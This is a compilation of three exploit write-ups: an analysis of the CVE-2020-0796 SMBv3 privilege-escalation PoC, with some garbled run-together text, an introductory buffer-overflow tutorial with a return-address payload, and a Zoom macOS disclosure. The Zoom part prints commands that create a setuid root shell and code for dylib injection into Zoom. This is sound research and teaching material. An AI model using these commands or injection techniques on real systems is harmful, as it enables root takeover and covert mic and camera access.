CVE-2020-0796 Windows SMBv3 LPE Exploit POC Analysis

Vulnerability Analysis · 404 Column · 404 English Paper

Author: SungLin@Knownsec 404 Team

Time: April 2, 2020

Chinese version: https://paper.seebug.org/1164/

0x00 Background

On March 12, 2020, Microsoft confirmed that a critical vulnerability affecting the SMBv3 protocol exists in the latest version of Windows 10 and assigned it CVE-2020-0796. It could allow an attacker to remotely execute code on the SMB server or client. On March 13 a PoC that causes a BSOD was published, and on March 30 a PoC for local privilege escalation was released. Here we analyze the local privilege escalation PoC.

0x01 Exploit principle

The vulnerability exists in the srv2.sys driver. Because SMB does not properly handle compressed data packets, the function



Srv2DecompressDatais called when processing the decompressed data packets. The compressed data size of the compressed data header,OriginalCompressedSegmentSizeandOffset, is not checked for legality, which results in the addition of a small amount of memory.SmbCompressionDecompresscan be used later for data processing. Using this smaller piece of memory can cause copy overflow or out-of-bounds access. When executing a local program, you can obtain the current offset address of thetoken + 0x40of the local program that is sent to the SMB server by compressing the data. After that, the offset address is in the kernel memory that is copied when the data is decompressed, and the token is modified in the kernel through a carefully constructed memory layout to enhance the permissions.0x02 Get Token

Let's analyze the code first. After the PoC program establishes a connection with the SMB server, it first obtains its own token by calling OpenProcessToken. The token address it obtains is then sent to the SMB server in the compressed data, so that it can be modified in the kernel driver. This token value is the address, in kernel memory, of the object behind the process's token handle. TOKEN is a kernel memory structure that describes the security context of the process, including the token privileges, login ID, session ID, token type, and so on.

The following is the token address obtained in my test.

0x03 Compressed Data



Next, poc will call





RtCompressBufferto compress a piece of data. By sending this compressed data to the SMB server, the SMB server will use this token offset in the kernel, and this piece of data is'A' * 0x1108 + (ktoken + 0x40).





The length of the compressed data is 0x13. Apart from the header of the compressed data segment, the packet carries two identical values, 0x1FF2FF00BC, alongside the compressed data, and these two values are the key to the elevation.

0x04 Debugging







Let's debug it first, because this is an integer overflow vulnerability. In the function srv2!Srv2DecompressData, the 32-bit addition 0xffffffff + 0x10 overflows and yields 0xf, so a much smaller buffer is allocated in srvnet!SrvNetAllocateBuffer.
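The 0xf result can be reproduced with plain 32-bit arithmetic. The following is only a minimal sketch: `add_u32` is a hypothetical helper (not a function from srv2.sys), and it assumes that the two header fields are summed in an unsigned 32-bit register.

```python
U32_MASK = 0xFFFFFFFF


def add_u32(a: int, b: int) -> int:
    """Add two values the way an unsigned 32-bit register would, dropping the carry."""
    return (a + b) & U32_MASK


original_size = 0xFFFFFFFF  # OriginalCompressedSegmentSize from the crafted header
offset = 0x10               # Offset from the crafted header

print(hex(add_u32(original_size, offset)))  # 0xf
```

With ordinary field values the helper behaves like a normal addition; only the crafted size makes the sum wrap around.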



After entering



srvnet! SmbCompressionDecompressandnt! RtlDecompressBufferEx2to continue decompression, then entering the functionnt! PoSetHiberRange, and then starting the decompression operation, addingOriginalMemory = 0xffff ffffto the memory address of theUnCompressBufferstorage data allocated by the integer overflow just started Get an address far larger than the limit, it will cause copy overflow.



However, the size of the data we finally need to copy is 0x1108, so there is still no overflow, because the size that was really allocated is 0x1278. The pool allocation goes through srvnet!SrvNetAllocateBuffer, which finally enters srvnet!SrvNetAllocateBufferFromPool and calls nt!ExAllocatePoolWithTag to allocate pool memory.



Although the copy did not overflow, it did overwrite other variables in this memory, including the return value of srv2!Srv2DecompressData. UnCompressBuffer_address sits at a fixed offset of 0x60 and the return value at a fixed offset of 0x1150, so the return value lies 0x10f0 bytes past the start of UnCompressBuffer. The field that stores the buffer address is at offset 0x1168, which is 0x1108 bytes past the start of the decompressed data.
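The relative offsets follow from simple subtraction. The sketch below only restates the numbers given in the text; the constant names are made up for illustration and do not come from the driver.

```python
# Offsets inside the allocated block, as quoted in the text (names are illustrative)
UNCOMPRESS_BUFFER_OFFSET = 0x60   # where the decompressed data starts
RETURN_VALUE_OFFSET = 0x1150      # where the returned structure lives
BUFFER_POINTER_OFFSET = 0x1168    # where the address of UnCompressBuffer is stored


def relative_to_buffer(offset: int) -> int:
    """Distance of a block offset from the start of the decompressed data."""
    return offset - UNCOMPRESS_BUFFER_OFFSET


print(hex(relative_to_buffer(RETURN_VALUE_OFFSET)))          # 0x10f0
print(hex(relative_to_buffer(BUFFER_POINTER_OFFSET)))        # 0x1108
print(hex(BUFFER_POINTER_OFFSET - RETURN_VALUE_OFFSET))      # 0x18
```

The last line is the 0x18 that shows up later in the analysis as v8 + 0x18.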

Why are these values fixed? This time OriginalSize = 0xffffffff and Offset = 0x10 are passed in, and their sum overflows to 0xf. srvnet!SrvNetAllocateBuffer checks the size it receives: since 0xf is less than 0x1100, the fixed value 0x1100 is used as the allocation size for the subsequent structure. When the value is greater than 0x1100, the size that was passed in is used.
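A minimal sketch of that size check, modelling only the comparison described above. `effective_allocation_size` is a hypothetical name, and the real srvnet!SrvNetAllocateBuffer does more work than this.

```python
MIN_ALLOCATION = 0x1100  # fixed size used for small requests, per the text


def effective_allocation_size(requested: int) -> int:
    """Return the size used for the allocation (illustrative model only)."""
    if requested < MIN_ALLOCATION:
        return MIN_ALLOCATION
    return requested


print(hex(effective_allocation_size(0xF)))     # 0x1100
print(hex(effective_allocation_size(0x2000)))  # 0x2000
```

Because the overflowed size 0xf always falls into the first branch, the layout of the allocated block is the same on every run.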

Now back to the decompression. The size of the compressed data is 0x13, and the decompression is performed normally: 0x1108 bytes of "A" are copied, and the 8-byte address token + 0x40 is copied right after the "A"s.



After decompressing and copying the decompressed data to the address that was initially allocated, the decompression function exits normally, and memcpy is then called for the next data copy. The key point is that rcx now holds the address token + 0x40 of the local program!

After the decompression, the memory layout is 0x1100 ('A') + Token = 0x1108. The call to srvnet!SrvNetAllocateBuffer then returns the memory address we need: v8 sits exactly at the initial memory offset 0x10f0, so v8 + 0x18 = 0x1108. The size of the copy is controllable, and the offset passed in is 0x10. Finally, memcpy copies the source data, 0x1FF2FF00BC, to the destination address 0xffff9b893fdc46f0 (token + 0x40). 16 bytes are overwritten there, and the token is successfully modified.

0x05 Elevation

The data that is written consists of two identical 0x1FF2FF00BC values. Why overwrite the data at token + 0x40 with two identical values? This is one of the ways to manipulate the token in the Windows kernel in order to elevate privileges. Generally, there are two methods.

The first method is to directly overwrite the Token. The second method is to modify the Token. Here, the Token is modified.



In WinDbg, you can run the kd> dt _token command to view its structure.



So we modify the _SEP_TOKEN_PRIVILEGES value to enable or disable privileges: Present and Enabled are both changed to 0x1FF2FF00BC, the full privilege set of the SYSTEM process token, which sets the permissions to:


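The 16 bytes that land on token + 0x40 can be sketched as follows. This assumes, as the text implies, that Present and Enabled are two consecutive 64-bit little-endian fields; `build_overwrite` is a hypothetical helper, not code from the PoC.

```python
import struct

PRIVILEGE_MASK = 0x1FF2FF00BC  # value quoted in the analysis


def build_overwrite(mask: int) -> bytes:
    """Pack the mask twice as little-endian 64-bit values: Present, then Enabled."""
    return struct.pack("<QQ", mask, mask)


overwrite = build_overwrite(PRIVILEGE_MASK)
print(len(overwrite))  # 16
```

Writing the same mask to both fields means every privilege that is present is also enabled.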

This successfully elevated the permissions in the kernel, and then execute any code by injecting regular shellcode into the windows process "winlogon.exe":



Then it performed the action of the calculator as follows:


This article was published by Seebug Paper. Please credit the source when reposting. Article URL: https://paper.seebug.org/1165/


-

Binary Exploitation 01 — Introduction

Mar 31 · 4 min read

GREETINGS FELLOW HACKERS!

It’s been a while since our last post, but this is because we’ve prepared something for you: a multi-episode Binary Exploitation Series. Without further ado, let’s get started.

What is Memory Corruption?

It might sound familiar, but what does it really mean?

Memory Corruption is a vast area which we will explore further throughout this series, but for now, it is important to remember that it refers to the action of “modifying a binary’s memory in a way that was not intended”. Basically any kind of system-level exploit involves some kind of memory corruption.

Let’s have a look at an example:

We will consider the following program: a short program that asks for user input. If the input matches the Admin’s secret Password, we will be granted Admin privileges, otherwise we will be a normal User.

How can we become an Admin without knowing the Password?



One solution is to brute-force the password. This approach might work for a short password, but for a 32-byte password, it’s useless. Then what can we do? Let’s play with random input values:



“Welcome Admin”, what just happened? Let’s take a closer look at the memory level, using a debugger, and understand why we became Admin.



We can see that the INPUT we enter will be loaded on the stack (“A stack is an area of memory for storing data temporarily”) at RBP-0x30 and the AUTH variable is located on the stack at RBP-0x4.

Another aspect we can observe is that the “gets” function has no limit for the number of characters it reads.

Thus, we can enter more than 32 characters. This will lead to a so-called Buffer Overflow.

As we can see, our input (‘A’*32 + ‘a’*16) will overflow the user_input buffer and overwrite the auth variable, thus giving us Admin privileges.
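To make the overwrite concrete, here is a small simulation of that stack frame. It is only a sketch: the frame is modelled as a byte array covering RBP-0x30 up to RBP, `unbounded_copy` is a hypothetical stand-in for gets, and treating auth as a 4-byte integer is an assumption.

```python
import struct

FRAME_SIZE = 0x30          # user_input starts at RBP-0x30
AUTH_OFFSET = 0x30 - 0x4   # auth lives at RBP-0x4, i.e. 44 bytes into the frame


def unbounded_copy(frame: bytearray, data: bytes) -> None:
    """Mimic gets(): copy every input byte into the frame, with no length check."""
    frame[0:len(data)] = data


def read_auth(frame: bytearray) -> int:
    """Read the (assumed) 4-byte auth variable from the simulated frame."""
    return struct.unpack_from("<i", frame, AUTH_OFFSET)[0]


frame = bytearray(FRAME_SIZE)

unbounded_copy(frame, b"A" * 32)
print(read_auth(frame))       # 0, a 32-byte input never reaches auth

unbounded_copy(frame, b"A" * 32 + b"a" * 16)
print(hex(read_auth(frame)))  # 0x61616161, auth now holds four 'a' bytes
```

Any non-zero value in auth is enough to take the Admin branch, which is why random long input "works".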

Think this is cool? Just wait, there’s even more.

We have seen that by performing buffer overflows we can overwrite variables on the stack. But is that all we can really do? Let’s have a quick look into how functions work.

Whenever a function is called, we can see that a value is pushed to the stack. That value is what we call a “return address”. After the function finishes executing, it can return to the function that called it using the “return address”.



So if the return address is placed on the stack and we can perform a buffer overflow, can we overwrite it? Let’s try.

Running the program with big input

As we can see, the program returned a “Segmentation Fault” because, when the main function finished executing, it tried to use the “return address”, but the return address had been overwritten with A’s by our input.

So what does this mean? This means that we can take over the execution flow by overwriting the “return address” with an address of another function. Let’s try to redirect the execution of the program to the takeover_the_world() function.

The function is located at address: 0x00000000004005c7 (one way we can find this is to use the command: objdump -d program_name).

Putting things together we get the following input (payload):

‘A’*32 + ‘a’*16 + ‘\xc7\x05\x40\x00\x00\x00\x00\x00’

And we got a shell. Hurray!
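The payload above can be assembled programmatically. This is a sketch under the article's own numbers: the 48 bytes of padding and the target address are copied from the text and depend on how that particular binary was built, and `build_payload` is a hypothetical helper.

```python
import struct

TARGET_ADDRESS = 0x00000000004005C7  # takeover_the_world(), as found with objdump in the article


def build_payload(target: int) -> bytes:
    """Padding from the article followed by the target address in little-endian order."""
    padding = b"A" * 32 + b"a" * 16
    return padding + struct.pack("<Q", target)


payload = build_payload(TARGET_ADDRESS)
print(len(payload))   # 56
print(payload[-8:])   # b'\xc7\x05@\x00\x00\x00\x00\x00'
```

The address is written least significant byte first because x86-64 is little-endian, which is why 0x4005c7 appears as \xc7\x05\x40 in the payload.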

Concluding this first part, I hope I have aroused your curiosity and interest in this wonderful topic. Buffer overflows are one of the many ways memory corruption can be achieved. In the upcoming episodes we will explore more techniques and strategies.

Until next time!

Source: https://medium.com/cyber-dacians/binary-exploitation-01-introduction-9fcd2cdce9c6

-

The 'S' in Zoom, Stands for Security

uncovering (local) security flaws in Zoom's latest macOS client

by: Patrick Wardle / March 30, 2020

Background

Given the current worldwide pandemic and government sanctioned lock-downs, working from home has become the norm …for now. Thanks to this, Zoom, “the leader in modern enterprise video communications” is well on its way to becoming a household verb, and as a result, its stock price has soared! 📈

However if you value either your (cyber) security or privacy, you may want to think twice about using (the macOS version of) the app.

In this blog post, we’ll start by briefly looking at recent security and privacy flaws that affected Zoom. Following this, we’ll transition into discussing several new security issues that affect the latest version of Zoom’s macOS client.

📝 Though the new issues we'll discuss today remain unpatched, they both are local security issues.

As such, to be successfully exploited they require that malware or an attacker already have a foothold on a macOS system.

Though Zoom is incredibly popular it has a rather dismal security and privacy track record.

In June 2019, the security researcher Jonathan Leitschuh discovered a trivially exploitable remote 0day vulnerability in the Zoom client for Mac, which “allow[ed] any malicious website to enable your camera without your permission” 😱

“This vulnerability allows any website to forcibly join a user to a Zoom call, with their video camera activated, without the user’s permission.

Additionally, if you’ve ever installed the Zoom client and then uninstalled it, you still have a localhost web server on your machine that will happily re-install the Zoom client for you, without requiring any user interaction on your behalf besides visiting a webpage. This re-install ‘feature’ continues to work to this day.” -Jonathan Leitschuh

📝 Interested in more details? Read Jonathan's excellent writeup: "Zoom Zero Day: 4+ Million Webcams & maybe an RCE?".

Rather hilariously Apple (forcibly!) removed the vulnerable Zoom component from users’ Macs worldwide via macOS’s Malware Removal Tool (MRT):

AFAIK, this is the only time Apple has taken this draconian action:

More recently Zoom suffered a rather embarrassing privacy faux pas, when it was uncovered that their iOS application was, “send[ing] data to Facebook even if you don’t have a Facebook account” …yikes!


📝 Interested in more details? Read Motherboard's writeup: "Zoom iOS App Sends Data to Facebook Even if You Don't Have a Facebook Account".

Although Zoom was quick to patch the issue (by removing the (ir)responsible code), many security researchers were quick to point out that said code should have never made it into the application in the first place:

And finally today, noted macOS security researcher Felix Seele (and #OBTS v2.0 speaker!) noted that Zoom’s macOS installer (rather shadily) performs its “[install] job without you ever clicking install":

"This is not strictly malicious but very shady and definitely leaves a bitter aftertaste. The application is installed without the user giving his final consent and a highly misleading prompt is used to gain root privileges. The same tricks that are being used by macOS malware." -Felix Seele

📝 For more details on this, see Felix's comprehensive blog post: "Good Apps Behaving Badly: Dissecting Zoom’s macOS installer workaround"

The (preinstall) scripts mentioned by Felix can be easily viewed (and extracted) from Zoom’s installer package via the Suspicious Package application:

Local Zoom Security Flaw #1: Privilege Escalation to Root

Zoom’s security and privacy track record leaves much to be desired.

As such, today when Felix Seele also noted that the Zoom installer may invoke the AuthorizationExecuteWithPrivileges API to perform various privileged installation tasks, I decided to take a closer look. Almost immediately I uncovered several issues, including a vulnerability that leads to a trivial and reliable local privilege escalation (to root!).

Stop me if you’ve heard me talk (rant) about this before, but Apple clearly notes that the AuthorizationExecuteWithPrivileges API is deprecated and should not be used. Why? Because the API does not validate the binary that will be executed (as root!) …meaning a local unprivileged attacker or piece of malware may be able to surreptitiously tamper with or replace that item in order to escalate their privileges to root (as well):

At DefCon 25, I presented a talk titled: “Death By 1000 Installers” that covers this in great detail:

…moreover in my blog post “Sniffing Authentication References on macOS” from just last week, we covered this in great detail as well!

Finally, this insecure API was (also) discussed in detail at “Objective by the Sea” v3.0, in a talk (by Julia Vashchenko) titled: “Job(s) Bless Us! Privileged Operations on macOS":

Now it should be noted that if the AuthorizationExecuteWithPrivileges API is invoked with a path to a (SIP) protected or read-only binary (or script), this issue would be thwarted (as in such a case, unprivileged code or an attacker may not be able to subvert the binary/script).

So the question here, in regards to Zoom, is: “How are they utilizing this inherently insecure API?” Because if they are invoking it insecurely, we may have a lovely privilege escalation vulnerability!

As discussed in my DefCon presentation, the easiest way to answer this question is simply to run a process monitor, execute the installer package (or whatever invokes the AuthorizationExecuteWithPrivileges API) and observe the arguments that are passed to security_authtrampoline (the setuid system binary that ultimately performs the privileged action):

The image above illustrates the flow of control initiated by the AuthorizationExecuteWithPrivileges API and shows how the item (binary, script, command, etc) that is to be executed with root privileges is passed as the first parameter to the security_authtrampoline process. If this parameter, this item, is editable (i.e. can be maliciously subverted) by an unprivileged attacker then that’s a clear security issue!

Let’s figure out what Zoom is executing via AuthorizationExecuteWithPrivileges!

First we download the latest version of Zoom’s installer for macOS (Version 4.6.8 (19178.0323)) from https://zoom.us/download:

Then, we fire up our macOS Process Monitor (https://objective-see.com/products/utilities.html#ProcessMonitor), and launch the Zoom installer package (Zoom.pkg).

If the user installing Zoom is running as a ‘standard’ (read: non-admin) user, the installer may prompt for administrator credentials:

…as expected our process monitor will observe the launching (ES_EVENT_TYPE_NOTIFY_EXEC) of /usr/libexec/security_authtrampoline to handle the authorization request:

    # ProcessMonitor.app/Contents/MacOS/ProcessMonitor -pretty
    {
      "event" : "ES_EVENT_TYPE_NOTIFY_EXEC",
      "process" : {
        "uid" : 0,
        "arguments" : [
          "/usr/libexec/security_authtrampoline",
          "./runwithroot",
          "auth 3",
          "/Users/tester/Applications/zoom.us.app",
          "/Applications/zoom.us.app"
        ],
        "ppid" : 1876,
        "ancestors" : [
          1876,
          1823,
          1820,
          1
        ],
        "signing info" : {
          "csFlags" : 603996161,
          "signatureIdentifier" : "com.apple.security_authtrampoline",
          "cdHash" : "DC98AF22E29CEC96BB89451933097EAF9E01242",
          "isPlatformBinary" : 1
        },
        "path" : "/usr/libexec/security_authtrampoline",
        "pid" : 1882
      },
      "timestamp" : "2020-03-31 03:18:45 +0000"
    }

And what is Zoom attempting to execute as root (i.e. what is passed to security_authtrampoline)?

…a bash script named runwithroot.

If the user provides the requested credentials to complete the install, the runwithroot script will be executed as root (note: uid: 0):

    {
      "event" : "ES_EVENT_TYPE_NOTIFY_EXEC",
      "process" : {
        "uid" : 0,
        "arguments" : [
          "/bin/sh",
          "./runwithroot",
          "/Users/tester/Applications/zoom.us.app",
          "/Applications/zoom.us.app"
        ],
        "ppid" : 1876,
        "ancestors" : [
          1876,
          1823,
          1820,
          1
        ],
        "signing info" : {
          "csFlags" : 603996161,
          "signatureIdentifier" : "com.apple.sh",
          "cdHash" : "D3308664AA7E12DF271DC78A7AE61F27ADA63BD6",
          "isPlatformBinary" : 1
        },
        "path" : "/bin/sh",
        "pid" : 1882
      },
      "timestamp" : "2020-03-31 03:18:45 +0000"
    }

The contents of runwithroot are irrelevant. All that matters is, can a local, unprivileged attacker (or piece of malware) subvert the script prior to its execution as root? (As again, recall the AuthorizationExecuteWithPrivileges API does not validate what is being executed).

Since it’s Zoom we’re talking about, the answer is of course yes! 😅

We can confirm this by noting that during the installation process, the macOS Installer (which handles installations of .pkgs) copies the runwithroot script to a user-writable temporary directory:

    tester@users-Mac T % pwd
    /private/var/folders/v5/s530008n11dbm2n2pgzxkk700000gp/T

    tester@users-Mac T % ls -lart com.apple.install.v43Mcm4r
    total 27224
    -rwxr-xr-x  1 tester  staff     70896 Mar 23 02:25 zoomAutenticationTool
    -rw-r--r--  1 tester  staff       513 Mar 23 02:25 zoom.entitlements
    -rw-r--r--  1 tester  staff  12008512 Mar 23 02:25 zm.7z
    -rwxr-xr-x  1 tester  staff       448 Mar 23 02:25 runwithroot
    ...

Lovely - it looks like we’re in business and may be able to gain root privileges!
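The "can an unprivileged user subvert this item?" question can be asked programmatically. The following is a rough sketch, not a tool from this post: `is_tamperable` is a hypothetical helper, and the temporary file merely stands in for the installer's copy of runwithroot.

```python
import os
import tempfile


def is_tamperable(path: str) -> bool:
    """Return True if the current user could modify or replace the file at `path`."""
    directory = os.path.dirname(os.path.abspath(path))
    # Editing in place needs write access to the file itself;
    # swapping the file out only needs write access to its directory.
    return os.access(path, os.W_OK) or os.access(directory, os.W_OK)


with tempfile.TemporaryDirectory() as workdir:
    script = os.path.join(workdir, "runwithroot")  # stand-in for the real script
    with open(script, "w") as handle:
        handle.write("#!/bin/sh\n")
    result = is_tamperable(script)

print(result)  # True
```

Run against the item passed to security_authtrampoline, a True result from an unprivileged account would point to the same class of issue described here.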

Exploitation of these types of bugs is trivial and reliable (though requires some patience …as you have to wait for the installer or updater to run!) as is shown in the following diagram:

To exploit Zoom, a local non-privileged attacker can simply replace or subvert the runwithroot script during an install (or upgrade?) to gain root access.

For example to pop a root shell, simply add the following commands to the runwithroot script:

    cp /bin/ksh /tmp
    chown root:wheel /tmp/ksh
    chmod u+s /tmp/ksh
    open /tmp/ksh

Le boom 💥:

Local Zoom Security Flaw #2: Code Injection for Mic & Camera Access

In order for Zoom to be useful it requires access to the system’s mic and camera.

On recent versions of macOS, this requires explicit user approval (which, from a security and privacy point of view is a good thing):

Unfortunately, Zoom has (for reasons unbeknown to me), a specific “exclusion” that allows malicious code to be injected into its process space, where said code can piggy-back off Zoom’s (mic and camera) access! This gives malicious code a way to either record Zoom meetings, or worse, access the mic and camera at arbitrary times (without the user access prompt)!

Modern macOS applications are compiled with a feature called the “Hardened Runtime”. This security enhancement is well documented by Apple, who note:

"The Hardened Runtime, along with System Integrity Protection (SIP), protects the runtime integrity of your software by preventing certain classes of exploits, like code injection, dynamically linked library (DLL) hijacking, and process memory space tampering." -Apple

I’d like to think that Apple attended my 2016 talk at ZeroNights in Moscow, where I noted this feature would be a great addition to macOS:

We can check that Zoom (or any application) is validly signed and compiled with the “Hardened Runtime” via the codesign utility:

    $ codesign -dvvv /Applications/zoom.us.app/
    Executable=/Applications/zoom.us.app/Contents/MacOS/zoom.us
    Identifier=us.zoom.xos
    Format=app bundle with Mach-O thin (x86_64)
    CodeDirectory v=20500 size=663 flags=0x10000(runtime) hashes=12+5 location=embedded
    ...
    Authority=Developer ID Application: Zoom Video Communications, Inc. (BJ4HAAB9B3)
    Authority=Developer ID Certification Authority
    Authority=Apple Root CA

A flags value of 0x10000(runtime) indicates that the application was compiled with the “Hardened Runtime” option, and thus said runtime should be enforced by macOS for this application.

Ok so far so good! Code injection attacks should be generically thwarted due to this!
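Checking that flag can be automated. A minimal sketch, assuming the codesign output has been captured as text; `has_hardened_runtime` and the `RUNTIME_FLAG` constant name are illustrative, with the 0x10000 value taken from the output above.

```python
import re

RUNTIME_FLAG = 0x10000  # the bit that codesign labels "(runtime)"


def has_hardened_runtime(codesign_output: str) -> bool:
    """Return True if the flags= field in the output has the runtime bit set."""
    match = re.search(r"flags=(0x[0-9a-fA-F]+)", codesign_output)
    if match is None:
        return False
    return bool(int(match.group(1), 16) & RUNTIME_FLAG)


sample = "CodeDirectory v=20500 size=663 flags=0x10000(runtime) hashes=12+5 location=embedded"
print(has_hardened_runtime(sample))  # True
```

Testing the bit rather than comparing the whole value keeps the check correct when other flags are set alongside it.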

…but (again) this is Zoom, so not so fast 😅

Let’s dump Zoom’s entitlements (entitlements are code-signed capabilities and/or exceptions), again via the codesign utility:

    codesign -d --entitlements :- /Applications/zoom.us.app/
    Executable=/Applications/zoom.us.app/Contents/MacOS/zoom.us
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN...>
    <plist version="1.0">
    <dict>
        <key>com.apple.security.automation.apple-events</key>
        <true/>
        <key>com.apple.security.device.audio-input</key>
        <true/>
        <key>com.apple.security.device.camera</key>
        <true/>
        <key>com.apple.security.cs.disable-library-validation</key>
        <true/>
        <key>com.apple.security.cs.disable-executable-page-protection</key>
        <true/>
    </dict>
    </plist>

The com.apple.security.device.audio-input and com.apple.security.device.camera entitlements are required as Zoom needs (user-approved) mic and camera access.

However the com.apple.security.cs.disable-library-validation entitlement is interesting. In short it tells macOS, “hey, yah I still (kinda?) want the “Hardened Runtime”, but please allow any libraries to be loaded into my address space” …in other words, library injections are a go!

Apple documents this entitlement as well:

So, thanks to this entitlement we can (in theory) circumvent the “Hardened Runtime” and inject a malicious library into Zoom (for example to access the mic and camera without an access alert).
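Spotting this exception in a dumped entitlements plist is easy to script. The sketch below is an illustration only: `allows_foreign_libraries` is a hypothetical helper, and the sample plist is a trimmed-down stand-in rather than Zoom's full entitlements.

```python
import plistlib

LIBRARY_VALIDATION_KEY = "com.apple.security.cs.disable-library-validation"


def allows_foreign_libraries(entitlements_xml: bytes) -> bool:
    """Return True if the plist sets the disable-library-validation entitlement."""
    entitlements = plistlib.loads(entitlements_xml)
    return entitlements.get(LIBRARY_VALIDATION_KEY, False) is True


sample = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
    <key>com.apple.security.device.camera</key>
    <true/>
    <key>com.apple.security.cs.disable-library-validation</key>
    <true/>
</dict>
</plist>"""

print(allows_foreign_libraries(sample))  # True
```

An application that has the Hardened Runtime flag but also returns True here is a candidate for the library injection approach discussed next.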

There are a variety of ways to coerce a remote process to load a dynamic library at load time, or at runtime. Here we’ll focus on a method I call “dylib proxying”, as it’s both stealthy and persistent (malware authors, take note!).

In short, we replace a legitimate library that the target (i.e. Zoom) depends on, then proxy all requests made by Zoom back to the original library, to ensure legitimate functionality is maintained. Both the app and the user remain none the wiser!

📝 Another benefit of the "dylib proxying" is that it does not compromise the code signing certificate of the binary (however, it may affect the signature of the application bundle).

A benefit of this is that Apple's runtime signature checks (e.g. for mic & camera access) do not seem to detect the malicious library, and thus still afford the process continued access to the mic & camera.

This is a method I’ve often (ab)used before in a handful of exploits, for example to (previously) bypass SIP:

As the image illustrates one could proxy the IASUtilities library so that malicious code would be automatically loaded (‘injected’) by the macOS dynamic linker (dyld) into Apple’s installer (a prerequisite for the SIP bypass exploit).

Here, we’ll similarly proxy a library (required by Zoom), such that our malicious library will be automatically loaded into Zoom’s trusted process address space any time it’s launched.

To determine what libraries Zoom is linked against (read: requires), and thus will be automatically loaded by the macOS dynamic loader, we can use otool with the -L flag:

    $ otool -L /Applications/zoom.us.app/Contents/MacOS/zoom.us
    /Applications/zoom.us.app/Contents/MacOS/zoom.us:
      @rpath/curl64.framework/Versions/A/curl64
      /System/Library/Frameworks/Cocoa.framework/Versions/A/Cocoa
      /System/Library/Frameworks/Foundation.framework/Versions/C/Foundation
      /usr/lib/libobjc.A.dylib
      /usr/lib/libc++.1.dylib
      /usr/lib/libSystem.B.dylib
      /System/Library/Frameworks/AppKit.framework/Versions/C/AppKit
      /System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
      /System/Library/Frameworks/CoreServices.framework/Versions/A/CoreServices

📝 Due to macOS's System Integrity Protection (SIP), we cannot replace any system libraries.

As such, for an application to be ‘vulnerable’ to “dylib proxying” it must load a library from either its own application bundle, or another non-SIP’d location (and must not be compiled with the “hardened runtime” (well unless it has the com.apple.security.cs.disable-library-validation entitlement exception)).

Looking at Zoom’s library dependencies, we see: @rpath/curl64.framework/Versions/A/curl64. We can resolve the runpath (@rpath) again via otool, this time with the -l flag:

    $ otool -l /Applications/zoom.us.app/Contents/MacOS/zoom.us
    ...
    Load command 22
              cmd LC_RPATH
          cmdsize 48
             path @executable_path/../Frameworks (offset 12)

The @executable_path will be resolved at runtime to the binary’s path, thus the dylib will be loaded out of: /Applications/zoom.us.app/Contents/MacOS/../Frameworks, or more specifically /Applications/zoom.us.app/Contents/Frameworks.

Taking a peek at Zoom’s application bundle, we can confirm the presence of curl64 (and many other frameworks and libraries) that will all be loaded whenever Zoom is launched:
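The run-path resolution just described can be sketched in a few lines. This is a simplification: `resolve_rpath` is a hypothetical helper that handles a single LC_RPATH entry and only performs lexical path normalization, whereas dyld itself walks every run path and checks the file system.

```python
import posixpath


def resolve_rpath(binary_path: str, rpath_entry: str, dependency: str) -> str:
    """Expand @executable_path and @rpath for one run-path entry (illustrative only)."""
    executable_dir = posixpath.dirname(binary_path)
    run_path = rpath_entry.replace("@executable_path", executable_dir)
    resolved = dependency.replace("@rpath", run_path)
    # Collapse the "MacOS/.." component purely lexically
    return posixpath.normpath(resolved)


print(resolve_rpath(
    "/Applications/zoom.us.app/Contents/MacOS/zoom.us",
    "@executable_path/../Frameworks",
    "@rpath/curl64.framework/Versions/A/curl64",
))
# /Applications/zoom.us.app/Contents/Frameworks/curl64.framework/Versions/A/curl64
```

The resolved location sits inside the application bundle, not in a SIP-protected system directory, which is what makes the library a candidate for proxying.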

📝 For details on "runpaths" (@rpath) and executable paths (@executable_path) as well as more information on creating a proxy dylib, check out my paper: "Dylib Hijacking on OS X"

For simplicity’s sake, we’ll target Zoom’s libssl.1.0.0.dylib (as it’s a stand-alone library, versus a framework/bundle) as the library we’ll proxy.

Step #1 is to rename the legitimate library. For example here, we simply prefix it with an underscore: _libssl.1.0.0.dylib

Now, if we run Zoom, it will (as expected) crash, as a library it requires (libssl.1.0.0.dylib) is ‘missing’:

    patrick$ /Applications/zoom.us.app/Contents/MacOS/zoom.us
    dyld: Library not loaded: @rpath/libssl.1.0.0.dylib
      Referenced from: /Applications/zoom.us.app/Contents/Frameworks/curl64.framework/Versions/A/curl64
      Reason: image not found
    Abort trap: 6

This is actually good news, as it means if we place any library named libssl.1.0.0.dylib in Zoom’s Frameworks directory, dyld will (blindly) attempt to load it.

Step #2, let’s create a simple library, with a custom constructor (that will be automatically invoked when the library is loaded):

    #import <Foundation/Foundation.h>
    #import <libproc.h>
    #import <unistd.h>

    // Invoked automatically by dyld as soon as the library is loaded
    __attribute__((constructor))
    static void constructor(void)
    {
        // Zero-initialized so the log line stays sane if the lookup fails
        char path[PROC_PIDPATHINFO_MAXSIZE] = {0};

        // Path of the process we have been loaded into
        proc_pidpath(getpid(), path, sizeof(path)-1);

        NSLog(@"zoom zoom: loaded in %d: %s", getpid(), path);

        return;
    }

…and save it to /Applications/zoom.us.app/Contents/Frameworks/libssl.1.0.0.dylib.

Then we re-run Zoom:

    patrick$ /Applications/zoom.us.app/Contents/MacOS/zoom.us
    zoom zoom: loaded in 39803: /Applications/zoom.us.app/Contents/MacOS/zoom.us

Hooray! Our library is loaded by Zoom.

Unfortunately Zoom then exits right away. This is also not unexpected as our libssl.1.0.0.dylib is not an ssl library…that is to say, it doesn’t export any required functionality (i.e. ssl capabilities!). So Zoom (gracefully) fails.

Not to worry, this is where the beauty of “dylib proxying” shines.

Step #3, via simple linker directives, we can tell Zoom, “hey, while our library doesn’t implement the required (ssl) functionality you’re looking for, we know who does!” and then point Zoom to the original (legitimate) ssl library (that we renamed _libssl.1.0.0.dylib).

Diagrammatically this looks like so:

To create the required linker directive, we add -Xlinker -reexport_library and then the path to the proxy library target, under “Other Linker Flags” in Xcode:

To complete the creation of the proxy library, we must also update the embedded reexport path (within our proxy dylib) so that it points to the (original, albeit renamed) ssl library. Luckily Apple provides the install_name_tool tool just for this purpose:

